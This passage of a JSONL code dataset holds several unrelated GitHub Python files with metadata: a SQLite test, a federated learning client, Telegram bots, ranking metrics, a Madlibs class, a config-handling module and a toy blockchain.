None:\n from dotenv import load_dotenv\n\n logger.info(\"从.env文件中加载环境变量 ...\")\n load_dotenv()\n return os.getenv(\"UID_PWD\").split(\"&\")\n\n\ndef download_img(image_url):\n logger.info(f\"Downloading image from {image_url}\")\n response = requests.get(image_url)\n with open(\"./page/images/passcode.png\", \"wb\") as f:\n f.write(response.content)\n logger.info(\"Download completed ...\")\n return True\n","repo_name":"bitter24/myown","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19111348417","text":"import sqlite3\n\ntry:\n sqliteConnection = sqlite3.connect('SQLite_Python.db')\n cursor = sqliteConnection.cursor()\n print('Baza danych została stworzona')\n\n sqlite_select_query = 'select sqlite_version();'\n cursor.execute(sqlite_select_query)\n record = cursor.fetchall()\n print('SQLite Database version:', record)\n cursor.close()\nexcept sqlite3.Error as error:\n print('Błąd podczas podłączenia bazy', error)\nfinally:\n if sqliteConnection:\n sqliteConnection.close()\n print(\"Połączenie zostało zakończone\")\n","repo_name":"dev-com2020/szkolenie_061222","sub_path":"baza.py","file_name":"baza.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38853452061","text":"import numpy as np\nimport copy \nimport math\n\nimport torch \nfrom torch import nn, optim\nimport torch.nn.functional as F\n\nclass Client_MTL(object):\n def __init__(self, name, model, local_bs, local_ep, lr, momentum, device, omega,\n train_dl_local = None, test_dl_local = None):\n \n self.name = name \n self.net = model\n self.local_bs = local_bs\n self.local_ep = local_ep\n self.lr = lr \n self.momentum = momentum \n self.device = device \n self.omega = omega\n self.loss_func = nn.CrossEntropyLoss()\n self.ldr_train = train_dl_local\n self.ldr_test = test_dl_local\n self.acc_best = 0 \n self.count = 0 \n self.save_best = True \n \n def train(self, idx, W_glob, is_print = False):\n self.net.to(self.device)\n self.net.train()\n \n optimizer = torch.optim.SGD(self.net.parameters(), lr=self.lr, momentum=self.momentum, weight_decay=0)\n\n epoch_loss = []\n for iteration in range(self.local_ep):\n batch_loss = []\n for batch_idx, (images, labels) in enumerate(self.ldr_train):\n images, labels = images.to(self.device), labels.to(self.device)\n self.net.zero_grad()\n #optimizer.zero_grad()\n log_probs = self.net(images)\n loss = self.loss_func(log_probs, labels)\n\n W = W_glob.clone()\n\n W_local = [v.flatten() for v in self.get_state_dict(keep_vars=True).values()]\n W_local = torch.cat(W_local)\n W[:, idx] = W_local\n\n loss_regularizer = 0\n loss_regularizer += W.norm() ** 2\n\n k = 4000\n for i in range(W.shape[0] // k):\n x = W[i * k:(i+1) * k, :]\n loss_regularizer += x.mm(self.omega).mm(x.T).trace()\n f = (int)(math.log10(W.shape[0])+1) + 1\n loss_regularizer *= 10 ** (-f)\n\n loss = loss + loss_regularizer\n loss.backward() \n \n optimizer.step()\n batch_loss.append(loss.item())\n \n epoch_loss.append(sum(batch_loss)/len(batch_loss))\n \n# if self.save_best: \n# _, acc = self.eval_test()\n# if acc > self.acc_best:\n# self.acc_best = acc \n \n return sum(epoch_loss) / len(epoch_loss)\n \n def get_state_dict(self, keep_vars=False):\n return self.net.state_dict(keep_vars=keep_vars)\n def get_best_acc(self):\n return self.acc_best\n def get_count(self):\n return self.count\n def get_net(self):\n return self.net\n def set_state_dict(self, state_dict):\n self.net.load_state_dict(state_dict)\n\n def eval_test(self):\n self.net.to(self.device)\n self.net.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in self.ldr_test:\n data, target = data.to(self.device), target.to(self.device)\n output = self.net(data)\n test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n test_loss /= len(self.ldr_test.dataset)\n accuracy = 100. * correct / len(self.ldr_test.dataset)\n return test_loss, accuracy\n \n def eval_train(self):\n self.net.to(self.device)\n self.net.eval()\n train_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in self.ldr_train:\n data, target = data.to(self.device), target.to(self.device)\n output = self.net(data)\n train_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n train_loss /= len(self.ldr_train.dataset)\n accuracy = 100. * correct / len(self.ldr_train.dataset)\n return train_loss, accuracy\n\ndef eval_test(net, args, ldr_test): \n net.to(args.device)\n net.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in ldr_test:\n data, target = data.to(args.device), target.to(args.device)\n output = net(data)\n test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n test_loss /= len(ldr_test.dataset)\n accuracy = 100. * correct / len(ldr_test.dataset)\n return test_loss, accuracy","repo_name":"MMorafah/PACFL","sub_path":"src/client/client_mtl.py","file_name":"client_mtl.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"3821541751","text":"# This file is Originally Written By @okay-retard on GitHub\n# The Author (Jayant Kageri) just Ported this for Devloper Userbot\n# (C) 2021 Jayant Kageri\n\nimport os\nfrom datetime import datetime\n\nfrom pyrogram import filters\nfrom pyrogram.types import User, InlineKeyboardMarkup, InlineKeyboardButton, Message\nfrom pyrogram.raw import functions\nfrom pyrogram.errors import PeerIdInvalid\nfrom _pyrogram import app\nfrom config import PREFIX\n\n\ndef ReplyCheck(message: Message):\n reply_id = None\n\n if message.reply_to_message:\n reply_id = message.reply_to_message.message_id\n\n elif not message.from_user.is_self:\n reply_id = message.message_id\n\n return reply_id\n\n\ninfotext = (\n \"**🕵️‍♀️ [{full_name}](tg://user?id={user_id})**\\n\\n\"\n \" ➠ ID pengguna: `{user_id}`\\n\"\n \" ➠ Nama depan: `{first_name}`\\n\"\n \" ➠ Nama belakang: `{last_name}`\\n\"\n \" ➠ Username: @{username}\\n\"\n)\n\n\ndef FullName(user: User):\n return user.first_name + \" \" + user.last_name if user.last_name else user.first_name\n\n\n@app.on_message(filters.command(\"info\", PREFIX) & filters.me)\nasync def whois(client, message):\n cmd = message.command\n if not message.reply_to_message and len(cmd) == 1:\n get_user = message.from_user.id\n elif len(cmd) == 1:\n get_user = message.reply_to_message.from_user.id\n elif len(cmd) > 1:\n get_user = cmd[1]\n try:\n get_user = int(cmd[1])\n except ValueError:\n pass\n try:\n user = await client.get_users(get_user)\n except Exception as e:\n await message.edit(f\"{e}\")\n return\n await message.edit_text(\n infotext.format(\n full_name=FullName(user),\n user_id=user.id,\n first_name=user.first_name,\n last_name=user.last_name or \"\",\n username=user.username or \"\",\n ),\n disable_web_page_preview=True,\n )\n\n\n@app.on_message(filters.command(\"id\", PREFIX) & filters.me)\nasync def id(client, message):\n text_unping = 'ID Obrolan:'\n if message.chat.username:\n text_unping = f'
    {text_unping}'\n text_unping += f' {message.chat.id}\\n'\n text = 'ID Pesan:'\n if message.link:\n text = f'{text}'\n text += f' {message.message_id}\\n'\n text_unping += text\n if message.from_user:\n text_unping += f'ID Pengguna: {message.from_user.id}\\n'\n text_ping = text_unping\n reply = message.reply_to_message\n if not getattr(reply, 'empty', True):\n text_unping += '\\n'\n text = 'ID pesan yang direply:'\n if reply.link:\n text = f'{text}'\n text += f' {reply.message_id}\\n'\n text_unping += text\n text_ping = text_unping\n if reply.from_user:\n text = 'ID pengguna yang direply:'\n if reply.from_user.username:\n text = f'{text}'\n text += f' {reply.from_user.id}\\n'\n text_unping += text\n text_ping += f'ID pengguna yang direply: {reply.from_user.id}\\n'\n if reply.forward_from:\n text_unping += '\\n'\n text = 'ID pengguna yang diforward:'\n if reply.forward_from.username:\n text = f'{text}'\n text += f' {reply.forward_from.id}\\n'\n text_unping += text\n text_ping += f'\\nID pengguna yang diforward: {reply.forward_from.id}\\n'\n reply = await message.edit(text_unping, disable_web_page_preview=True)\n if text_unping != text_ping:\n await message.edit(text_ping, disable_web_page_preview=True)\n","repo_name":"FawazXs/YamiUserbot","sub_path":"_pyrogram/modules/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73073800487","text":"import logging\nfrom telegram.ext import Updater, MessageHandler, Filters, ConversationHandler\nfrom telegram.ext import CallbackContext, CommandHandler\nfrom settings import TOKEN\n\nlogger = logging.getLogger(__name__)\n\n\ndef start(update, context):\n update.message.reply_text(\n \"Привет. Пройдите небольшой опрос, пожалуйста!\\n\"\n \"Вы можете прервать опрос, послав команду /stop.\\n\"\n \"В каком городе вы живёте?\")\n return 1\n\n\ndef first_response(update, context):\n locality = update.message.text\n if locality == '/skip':\n locality = 'у вас за окном'\n update.message.reply_text(\n \"Какая погода у вас за окном\")\n else:\n update.message.reply_text(f\"Какая погода в городе {locality}?\")\n return 2\n\n\ndef second_response(update, context):\n weather = update.message.text\n print(weather)\n update.message.reply_text(\"Спасибо за участие в опросе! Всего доброго!\")\n return ConversationHandler.END\n\n\ndef stop(update, context):\n return ConversationHandler.END\n\n\ndef main():\n updater = Updater(TOKEN, use_context=True)\n\n dp = updater.dispatcher\n conv_handler = ConversationHandler(\n entry_points=[CommandHandler('start', start)],\n\n states={\n 1: [MessageHandler(Filters.text, first_response)],\n 2: [MessageHandler(Filters.text, second_response)]\n },\n\n fallbacks=[CommandHandler('stop', stop)]\n )\n dp.add_handler(conv_handler)\n updater.start_polling()\n\n updater.idle()\n\n\nif __name__ == '__main__':\n main()","repo_name":"axelsvenn/web-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24829532489","text":"\r\n\r\ndef mrr(predictions, ground_truth_idx):\r\n \"\"\"Calculates mean reciprocal rank (MRR) for given predictions and ground truth values.\r\n :param predictions: BxN tensor of prediction values where B is batch size and N number of classes. Predictions\r\n must be sorted in class ids order\r\n :param ground_truth_idx: Bx1 tensor with index of ground truth class\r\n :return: Mean reciprocal rank score\r\n \"\"\"\r\n indices = predictions.argsort()\r\n mean_rank = (indices == ground_truth_idx).nonzero().float().add(1.0).sum().item()\r\n reciprocal_rank = 1.0/mean_rank\r\n\r\n return reciprocal_rank\r\n\r\ndef hit_at_k( predictions, ground_truth,k):\r\n zero_tensor = torch.Tensor([0])\r\n one_tensor = torch.Tensor([1])\r\n ground_truth = ground_truth#.cuda()\r\n _, indices = predictions.topk(k=k, largest=False)\r\n indices = indices.cuda()\r\n rank = torch.where(indices == ground_truth, one_tensor.cuda(), zero_tensor.cuda()).sum().item()\r\n\r\n return rank\r\n\r\ndef gen_mean_rank(predictions, ground_truth_idx):\r\n indices = predictions.argsort()\r\n mean_rank = (indices == ground_truth_idx).nonzero().float().add(1.0).sum().item()\r\n mean_rank =float(mean_rank / predictions.size()[0])\r\n\r\n return mean_rank\r\n\r\n","repo_name":"Pallab38/model_transE","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35413966950","text":"\"\"\"Madlibs Stories.\"\"\"\n\n\nclass Story:\n \"\"\"Madlibs story.\n To make a story, pass a list of prompts, and the text\n of the template.\n >>> s = Story([\"noun\", \"verb\"],\n ... \"I love to {verb} a good {noun}.\")\n To generate text from a story, pass in a dictionary-like thing\n of {prompt: answer, promp:answer):\n >>> ans = {\"verb\": \"eat\", \"noun\": \"mango\"}\n >>> s.generate(ans)\n 'I love to eat a good mango.'\n \"\"\"\n\n def __init__(self, code, title, words, text):\n \"\"\"Create story with words and template text.\"\"\"\n\n self.code = code\n self.title = title\n self.prompts = words\n # list of the prompts used in the story template\"\n self.template = text\n # The story template including the prompts to be replaced\n\n def __repr__(self):\n return f\"\"\n\n def generate(self, answers):\n \"\"\"Substitute answers into text.\"\"\"\n\n text = self.template\n # text is the story template with the prompts to be replaced by the answers generated from the form\n\n for (key, val) in answers.items():\n # unpack the answers dict into key value pairs\n text = text.replace(\"{\" + key + \"}\", val)\n # for each key value pair, replace the key and {} with its associated value from the answers dict\n\n return text\n # returns the text from the story template with the answers in place of the prompts\n\n\n\nstory1 = Story(\n \"s1\",\n \"Once Upon A Time\",\n [\"place\", \"noun\", \"verb\", \"adjective\", \"plural_noun\"],\n \"\"\"Once upon a time in a long-ago {place}, there lived a\n large {adjective} {noun}. It loved to {verb} {plural_noun}.\"\"\"\n)\n\nstory2 = Story(\n \"s2\",\n \"Wish You Were Here\",\n [\"place\", \"noun\", \"verb\", \"adjective\", \"plural_noun\"],\n \"\"\"Once upon a time in a long-ago {place}, there lived a\n large {adjective} {noun}. It loved to {verb} {plural_noun}.\"\"\"\n)\n\nstory3 = Story(\n \"s3\",\n \"Best Day Ever\",\n [\"place\", \"noun\", \"verb\", \"adjective\", \"plural_noun\"],\n \"\"\"Once upon a time in a long-ago {place}, there lived a\n large {adjective} {noun}. It loved to {verb} {plural_noun}.\"\"\"\n)\n\nstories = {story.code: story for story in [story1, story2, story3]}","repo_name":"sasha8265/flask-madlibs","sub_path":"stories.py","file_name":"stories.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20011616060","text":"\"\"\"\nBaseline hierarchical configuration setup functions for Brokkr.\n\"\"\"\n\n# Standard library imports\nimport abc\nimport argparse\nimport collections.abc\nimport copy\nimport json\nimport logging\nimport os\nfrom pathlib import Path\n\n# Third party imports\nimport tomli\nimport tomli_w\n\n# Local imports\nfrom brokkr.constants import (\n LEVEL_NAME_LOCAL,\n LEVEL_NAME_REMOTE,\n LEVEL_NAME_SYSTEM,\n LEVEL_NAME_SYSTEM_CLIENT,\n )\nimport brokkr.utils.misc\n\n\n# General static constants\nDEFAULT_CONFIG_TYPE_NAME = \"config\"\nLEVEL_NAME_CLI_ARGS = \"cli_args\"\nLEVEL_NAME_DEFAULTS = \"defaults\"\nLEVEL_NAME_ENV_VARS = \"env_vars\"\nLEVEL_NAME_FILE = \"local\"\nLEVEL_NAME_OVERLAY = \"overlay\"\nLEVEL_NAME_PRESETS = \"presets\"\n\nEXTENSION_TOML = \"toml\"\nEXTENSION_JSON = \"json\"\nEXTENSION_DEFAULT = EXTENSION_TOML\nEXTENSIONS_SUPPORTED = [EXTENSION_TOML, EXTENSION_JSON]\n\nVERSION_KEY = \"config_version\"\nEMPTY_CONFIG = (\"config_is_empty\", True)\nJSON_SEPERATORS = (\",\", \":\")\nCONFIG_VERSION_DEFAULT = 1\n\nLEVEL_CLASS = \"level_class\"\nLEVEL_ARGS = \"level_args\"\n\n\n# --- Utility functions --- #\n\ndef check_extension_supported(extension):\n if extension not in EXTENSIONS_SUPPORTED:\n raise ValueError(\"Extension must be one of \"\n f\"{EXTENSIONS_SUPPORTED}, not {extension}\")\n\n\ndef convert_paths(config_data, path_variables):\n # Format string paths as pathlib paths with username expanded\n for key_name in path_variables:\n inner_dict = config_data\n try:\n inner_dict = brokkr.utils.misc.get_inner_dict(\n obj=config_data, keys=key_name[:-1])\n inner_dict[key_name[-1]] = brokkr.utils.misc.convert_path(\n inner_dict[key_name[-1]])\n # Ignore missing keys\n except KeyError:\n continue\n return config_data\n\n\ndef read_config_file(path, extension=None, logger=None):\n if logger is True:\n logger = logging.getLogger(__name__)\n path = Path(path)\n if extension is None:\n extension = path.suffix.strip(\".\")\n check_extension_supported(extension)\n if extension == EXTENSION_TOML:\n try:\n with open(path, mode=\"rb\") as toml_file:\n config_data = tomli.load(toml_file)\n except tomli.TOMLDecodeError as e:\n if logger is not None:\n logger.error(\"%s reading TOML config file %r: %s\",\n type(e).__name__, path.as_posix(), e)\n logger.info(\"Error details:\", exc_info=True)\n raise SystemExit(1) from e\n raise\n elif extension == EXTENSION_JSON:\n with open(path, \"r\", encoding=\"utf-8\") as config_file:\n try:\n config_data = json.load(config_file)\n except Exception as e:\n if logger is not None:\n logger.error(\"%s reading JSON config file %r: %s\",\n type(e).__name__, path.as_posix(), e)\n logger.info(\"Error details:\", exc_info=True)\n raise SystemExit(1) from e\n raise\n\n return config_data\n\n\ndef write_config_file(config_data, path, extension=None):\n path = Path(path)\n if extension is None:\n extension = Path(path).suffix.strip(\".\")\n check_extension_supported(extension)\n os.makedirs(path.parent, exist_ok=True)\n if extension == EXTENSION_TOML:\n with open(path, \"wb\") as config_file:\n tomli_w.dump(config_data, config_file)\n elif extension == EXTENSION_JSON:\n with open(path, \"w\", encoding=\"utf-8\", newline=\"\\n\") as config_file:\n json.dump(config_data, config_file,\n allow_nan=False, separators=JSON_SEPERATORS)\n\n\ndef insert_values(config_data, insert_items, logger=None):\n # pylint: disable=too-many-nested-blocks, too-many-branches\n if logger is True:\n logger = logging.getLogger(__name__)\n\n # Insert the specified values into the given keys\n for preset_name, preset_data in config_data.items():\n for table_name, target_key in insert_items:\n if (preset_data.get(table_name, None) is None\n or preset_data.get(target_key, None) is None):\n continue # Skip if source or target table is not preset\n if preset_data[table_name].get(\n target_key, None) is not None:\n # If target key is present at first level, use that\n target_tables = {table_name: preset_data[table_name]}\n else:\n # Otherwise, check for the key in the table's subdicts\n target_tables = preset_data[table_name]\n for target_name, target_table in target_tables.items():\n if target_table.get(target_key, None) is None:\n continue # Skip target tables that lack the key at all\n if not target_table[target_key]:\n # If key is empty, fill it with the entire source table\n target_table[target_key] = preset_data[target_key]\n continue\n # Otherwise, do a lookup in the source table\n try:\n if brokkr.utils.misc.is_iterable(\n target_table[target_key]):\n if isinstance(preset_data[target_key],\n collections.abc.Mapping):\n # If the target is an iterable and the src a dict,\n # look up each value in the source table\n target_table[target_key] = {\n inner_key: preset_data[target_key][inner_key]\n for inner_key in target_table[target_key]}\n else:\n # Otherwise, if both are lists, merge them\n target_table[target_key] = set(\n target_table[target_key]\n + preset_data[target_key])\n else:\n # Otherwise, look up the value in the source table\n # and merge them, keeping values in the original\n merged_table = brokkr.utils.misc.update_dict_recursive(\n preset_data[target_key][target_table[target_key]],\n target_table)\n target_table.update(merged_table)\n # And remove the now-redundant item\n del target_table[target_key]\n except KeyError as e:\n if not logger:\n raise\n logger.error(\n \"%s inserting value for preset %r: \"\n \"Can't find inner key %s in key %r to insert into \"\n \"table %r, subtable %r\",\n type(e).__name__, preset_name, e, target_key,\n table_name, target_name)\n logger.info(\"Error details:\", exc_info=True)\n logger.info(\"Possible keys: %r\",\n list(preset_data[target_key].keys()))\n raise SystemExit(1) from e\n\n return config_data\n\n\n# --- Config type --- #\n\nclass ConfigType(brokkr.utils.misc.AutoReprMixin):\n def __init__(\n self,\n name,\n defaults=None,\n overlay=None,\n local_config_path=None,\n preset_config_path=None,\n path_variables=None,\n config_version=CONFIG_VERSION_DEFAULT,\n ):\n self.name = name\n self.defaults = {} if defaults is None else defaults\n self.overlay = overlay\n self.local_config_path = (\n None if local_config_path is None else Path(local_config_path))\n self.preset_config_path = (\n None if preset_config_path is None else Path(preset_config_path))\n self.path_variables = [] if path_variables is None else path_variables\n self.config_version = config_version\n\n\n# --- Config level classes #\n\nclass ConfigLevel(brokkr.utils.misc.AutoReprMixin, metaclass=abc.ABCMeta):\n def __init__(\n self,\n name,\n config_type=None,\n logger=None,\n ):\n self.name = name\n self.config_type = (ConfigType(DEFAULT_CONFIG_TYPE_NAME)\n if config_type is None else config_type)\n self.logger = logger\n\n def generate_config(self):\n if self.config_type.config_version is not None:\n config_data = {VERSION_KEY: self.config_type.config_version}\n else:\n config_data = {}\n return config_data\n\n @abc.abstractmethod\n def read_config(self, input_data=None):\n config_data = convert_paths(\n input_data, self.config_type.path_variables)\n return config_data\n\n\nclass WritableConfigLevel(ConfigLevel, metaclass=abc.ABCMeta):\n @abc.abstractmethod\n def write_config(self, config_data=None):\n pass\n\n\nclass DefaultsConfigLevel(ConfigLevel):\n def __init__(self, name=LEVEL_NAME_DEFAULTS, **kwargs):\n super().__init__(name=name, **kwargs)\n\n def generate_config(self):\n config_data = super().generate_config()\n config_data = config_data.update(self.config_type.defaults)\n return config_data\n\n def read_config(self, input_data=None):\n if input_data is None:\n input_data = copy.deepcopy(self.config_type.defaults)\n else:\n input_data = copy.deepcopy(input_data)\n return super().read_config(input_data)\n\n\nclass FileConfigLevel(WritableConfigLevel):\n def __init__(\n self,\n name=LEVEL_NAME_FILE,\n path=None,\n extension=EXTENSION_DEFAULT,\n preset=False,\n append_level=False,\n **kwargs,\n ):\n check_extension_supported(extension)\n super().__init__(name=name, **kwargs)\n self.extension = extension\n self.preset = preset\n\n # Setup full config path given defaults\n if path is not None:\n self.path = Path(path)\n elif self.preset:\n self.path = self.config_type.preset_config_path\n else:\n self.path = self.config_type.local_config_path\n\n # Generate filename and add to path if needed\n if self.path.suffix != self.extension:\n config_filename = self.config_type.name\n if append_level:\n config_filename = \"_\".join([config_filename, self.name])\n config_filename += (\".\" + self.extension)\n self.path = self.path / config_filename\n\n def read_config(self, input_data=None):\n if input_data is None:\n try:\n config_data = read_config_file(\n path=self.path,\n extension=self.extension,\n logger=self.logger,\n )\n # Generate or ignore config_name file if it does not yet exist\n except FileNotFoundError:\n if not self.preset:\n config_data = self.write_config()\n else:\n config_data = {}\n else:\n config_data = copy.deepcopy(input_data)\n\n # Delete empty config key, added to avoid unreadable empty JSONs\n try:\n del config_data[EMPTY_CONFIG[0]]\n except KeyError:\n pass\n\n config_data = super().read_config(config_data)\n return config_data\n\n def write_config(self, config_data=None):\n # Prevent JSON errors from serializing/deserializing empty dict\n if not config_data and self.extension == EXTENSION_JSON:\n config_data = {EMPTY_CONFIG[0]: EMPTY_CONFIG[1]}\n\n # Merge config data with generated baseline\n if not config_data:\n config_data = self.generate_config()\n else:\n config_data = {**self.generate_config(), **config_data}\n\n write_config_file(config_data, self.path)\n return config_data\n\n\nclass PresetsConfigLevel(ConfigLevel):\n def __init__(\n self,\n name=LEVEL_NAME_PRESETS,\n path=None,\n filename_glob=f\"*.preset.{EXTENSION_DEFAULT}\",\n key_name=\"name\",\n template=None,\n insert_items=None,\n **kwargs,\n ):\n super().__init__(name=name, **kwargs)\n self.filename_glob = filename_glob\n self.key_name = key_name\n self.template = {} if template is None else template\n self.insert_items = {} if insert_items is None else insert_items\n\n if path is not None:\n self.path = Path(path)\n else:\n self.path = self.config_type.local_config_path\n\n def read_config(self, input_data=None):\n if input_data is None:\n preset_paths = self.path.glob(self.filename_glob)\n presets = {\n path: brokkr.utils.misc.update_dict_recursive(\n copy.deepcopy(self.template), read_config_file(\n path=path, logger=self.logger))\n for path in preset_paths}\n config_data = {\n preset.get(self.key_name, path.stem.split(\".\")[0]): preset\n for path, preset in presets.items()}\n config_data = insert_values(\n config_data, self.insert_items, logger=self.logger)\n\n else:\n config_data = copy.deepcopy(input_data)\n\n config_data = super().read_config(input_data=config_data)\n return config_data\n\n\nclass MappingConfigLevel(ConfigLevel):\n def __init__(\n self,\n name,\n mapping,\n **kwargs,\n ):\n self.mapping = mapping\n super().__init__(name=name, **kwargs)\n\n def read_config(self, input_data=None):\n config_data = {}\n if input_data:\n for src_key, config_keys in self.mapping.items():\n config_value = input_data.get(src_key, None)\n # Recursively set config keys\n if config_value is not None:\n inner_dict = config_data\n for config_section in config_keys[:-1]:\n try:\n inner_dict = inner_dict[config_section]\n except KeyError:\n inner_dict[config_section] = {}\n inner_dict = inner_dict[config_section]\n inner_dict[config_keys[-1]] = config_value\n\n return super().read_config(config_data)\n\n\nclass EnvVarsConfigLevel(MappingConfigLevel):\n def __init__(self, name=LEVEL_NAME_ENV_VARS, mapping=None, **kwargs):\n super().__init__(name=name, mapping=mapping, **kwargs)\n\n def read_config(self, input_data=None):\n if input_data is None:\n input_data = os.environ\n config_data = super().read_config(input_data)\n return config_data\n\n\nclass CLIArgsConfigLevel(MappingConfigLevel):\n def __init__(self, name=LEVEL_NAME_CLI_ARGS, mapping=None, **kwargs):\n super().__init__(name=name, mapping=mapping, **kwargs)\n\n def read_config(self, input_data=None):\n if input_data is None:\n arg_parser = argparse.ArgumentParser(\n argument_default=argparse.SUPPRESS,\n usage=argparse.SUPPRESS,\n add_help=False,\n )\n for arg_name in self.mapping.keys():\n arg_parser.add_argument(f\"--{arg_name.replace('_', '-')}\")\n\n cli_args, __ = arg_parser.parse_known_args()\n else:\n input_data = cli_args\n\n # Convert to dict if cli_args is a namespace, ignoring errors\n try:\n cli_args = vars(cli_args)\n except TypeError:\n pass\n\n config_data = super().read_config(cli_args)\n return config_data\n\n\n# --- Config handler classes #\n\nclass ConfigHandler(brokkr.utils.misc.AutoReprMixin):\n def __init__(self, config_type=None, config_levels=None):\n self.config_type = (ConfigType(DEFAULT_CONFIG_TYPE_NAME)\n if config_type is None else config_type)\n\n config_levels = [] if config_levels is None else config_levels\n self.config_levels = {}\n if (self.config_type.defaults is not None\n and not any((isinstance(config_level, DefaultsConfigLevel)\n for config_level in config_levels))):\n defaults_config_level = DefaultsConfigLevel(\n config_type=self.config_type)\n config_levels = [defaults_config_level, *config_levels]\n for config_level in config_levels:\n self.config_levels[config_level.name] = config_level\n\n def read_configs(self, config_names=None):\n configs = {}\n if config_names is None:\n config_names = self.config_levels.keys()\n configs = {config_name: self.config_levels[config_name].read_config()\n for config_name in config_names}\n if self.config_type.overlay is not None:\n configs[LEVEL_NAME_OVERLAY] = copy.deepcopy(\n self.config_type.overlay)\n return configs\n\n def render_config(self, configs=None):\n if configs is None:\n configs = self.read_configs()\n\n # Recursively build final config dict from succession of loaded configs\n rendered_config = copy.deepcopy(\n configs[list(configs.keys())[0]])\n for config_name in list(configs.keys())[1:]:\n if configs[config_name]:\n rendered_config = brokkr.utils.misc.update_dict_recursive(\n rendered_config, configs[config_name])\n\n return rendered_config\n\n\nCONFIG_LEVEL_PRESETS = {\n LEVEL_NAME_SYSTEM: {LEVEL_ARGS: {\n \"preset\": True}},\n LEVEL_NAME_SYSTEM_CLIENT: {LEVEL_ARGS: {\n \"preset\": True, \"append_level\": True}},\n LEVEL_NAME_REMOTE: {LEVEL_ARGS: {\n \"extension\": EXTENSION_JSON, \"append_level\": True}},\n LEVEL_NAME_LOCAL: {},\n }\n\n\nclass ConfigHandlerFactory(brokkr.utils.misc.AutoReprMixin):\n def __init__(\n self,\n level_presets=None,\n overlays=None,\n ignore_cli_args=False,\n **default_type_kwargs,\n ):\n self.level_presets = (\n CONFIG_LEVEL_PRESETS if level_presets is None else level_presets)\n self.overlays = overlays\n self.ignore_cli_args = ignore_cli_args\n self.default_type_kwargs = default_type_kwargs\n\n def create_config_handler(self, name, config_levels, **type_kwargs):\n type_kwargs = {\n **self.default_type_kwargs,\n **{\"overlay\":\n None if self.overlays is None else self.overlays.get(name, {})},\n **type_kwargs,\n }\n config_type = ConfigType(name=name, **type_kwargs)\n\n rendered_config_levels = []\n for config_level in config_levels:\n if not isinstance(config_level, ConfigLevel):\n try:\n level_preset = self.level_presets[config_level]\n except (KeyError, TypeError):\n # If the level isn't in the preset dict or isn't a str\n level_preset = config_level\n level_class = level_preset.get(LEVEL_CLASS, FileConfigLevel)\n level_args = level_preset.get(LEVEL_ARGS, {})\n # If the level was loaded from a preset, use the preset's name\n if level_preset != config_level:\n level_args[\"name\"] = level_args.get(\"name\", config_level)\n config_level = level_class(\n config_type=config_type, **level_args)\n if (self.ignore_cli_args\n and isinstance(config_level, CLIArgsConfigLevel)):\n continue\n rendered_config_levels.append(config_level)\n\n config_handler = ConfigHandler(config_type=config_type,\n config_levels=rendered_config_levels)\n return config_handler\n","repo_name":"project-mjolnir/brokkr","sub_path":"src/brokkr/config/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":20198,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"15186487786","text":"import hashlib\nfrom block import Block\n\nclass Chain():\n def __init__(self, difficulty):\n self.difficulty = difficulty\n #list that can store our blocks\n self.blocks = []\n #kind of like lobby, \n #if thers data theyll mine it and add to chain\n self.pool = []\n self.create_origin_block()\n\n #recives a block and tests it\n def proof_of_work(self,block):\n hash = hashlib.sha256()\n hash.update(str(block).encode('utf-8'))\n #weather or not the block matches the difficulty requirment\n return block.hash.hexdigest() == hash.hexdigest() and int(hash.hexdigest(),16) < 2**(256-self.difficulty) and block.previous_hash == self.blocks[-1].hash\n\n def add_to_chain(self,block):\n if self.proof_of_work(block):\n self.blocks.append(block)\n\n def add_to_pool(self,data):\n self.pool.append(data)\n\n #create the initial block\n def create_origin_block(self):\n hash = hashlib.sha256()\n hash.update(\"\".encode('utf-8'))\n origin = Block(\"Origin\", hash)\n origin.mine(self.difficulty)\n self.blocks.append(origin)\n\n #checks if the pool has blocks, mines them and adds it to chain\n def mine(self):\n if len(self.pool) > 0:\n data = self.pool.pop()\n block = Block(data,self.blocks[-1].hash)\n block.mine(self.difficulty)\n self.add_to_chain(block)\n print(\"\\n\\n===================================\")\n print(\"Hash : \",block.hash.hexdigest())\n print(\"Previous Hash : \",block.previous_hash.hexdigest())\n print(\"Nonce : \",block.nonce)\n print(\"Data : \",block.data)\n print(\"\\n\\n===================================\")\n\n\n\n\n","repo_name":"bhavyabhatia11/CarbonChain","sub_path":"Dummy Blockchain/chain.py","file_name":"chain.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 